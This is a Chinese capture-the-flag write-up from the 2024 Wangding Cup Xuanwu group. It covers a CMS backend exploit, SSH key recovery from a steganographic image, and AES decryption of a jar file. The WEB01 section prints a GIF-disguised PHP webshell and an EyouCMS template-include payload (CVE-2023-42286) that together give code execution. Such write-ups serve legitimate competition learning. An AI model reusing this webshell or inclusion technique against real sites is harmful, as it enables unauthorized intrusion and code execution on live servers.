2024网鼎杯玄武组WP

admin 2024年11月7日16:24:41评论15 views字数 723阅读2分24秒阅读模式

本次参加了网鼎杯玄武组的比赛,大佬云集,我们队伍就解出了三道题目,重在参与!

2024网鼎杯玄武组WP

WEB01

使用默认密码登录后台 admin/admin

2024网鼎杯玄武组WP

通过网上搜索到公开的漏洞 https://github.com/Nacl122/CVEReport/blob/main/CVE-2023-42286/EyouCMS%20Backend%20RCE.md

进行测试

构造一个图片马

  • 1

  • 2

GIF89a  
<?php eval(system("cat ../../../flag.txt"));?>

上传

2024网鼎杯玄武组WP

  • 1

{eyou:include file="uploads/allimg/20241104/1-241104123542928.gif" /}

找到模板功能,将文件包含到index.html中

2024网鼎杯玄武组WP

2024网鼎杯玄武组WP

接着访问首页就可以获取到flag

2024网鼎杯玄武组WP

WEB03

利用 dirb 工具爆破 web 路径,发现存在 robots.txt,利用 username

和 password 登录系统发现需要私钥登录。

2024网鼎杯玄武组WP

下载 wbStego4.bmp 文件,利用 ctf 工具读取图片信息,结合图片名称,发现图片存在隐写,利用 wbs43open 工具读取隐写信息
2024网鼎杯玄武组WP

2024网鼎杯玄武组WP
隐写信息疑似ssh公钥,将该值复制到单独的id_rsa文件中,并修改为标准的公钥格式,并利用rsacracker工具爆破私钥

2024网鼎杯玄武组WP

新建私钥文件id_rsa并利用私钥登录获取flag

2024网鼎杯玄武组WP

REVERSE02

下载题目是一个jar文件,加载到idea分析,发现是aes加密

2024网鼎杯玄武组WP

解密

2024网鼎杯玄武组WP

2024网鼎杯玄武组WP

附上部分题目

  • 1

  • 2

  • 3

2024网鼎杯玄武部分题目.zip
链接:https://pan.baidu.com/s/1VG7WKmyKUdT-xM-OE0JP4Q?pwd=y426
提取码:y426

原文始发于微信公众号(安全逐梦人):2024网鼎杯玄武组WP

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月7日16:24:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   2024网鼎杯玄武组WPhttps://cn-sec.com/archives/3368759.html

发表评论

匿名网友 填写信息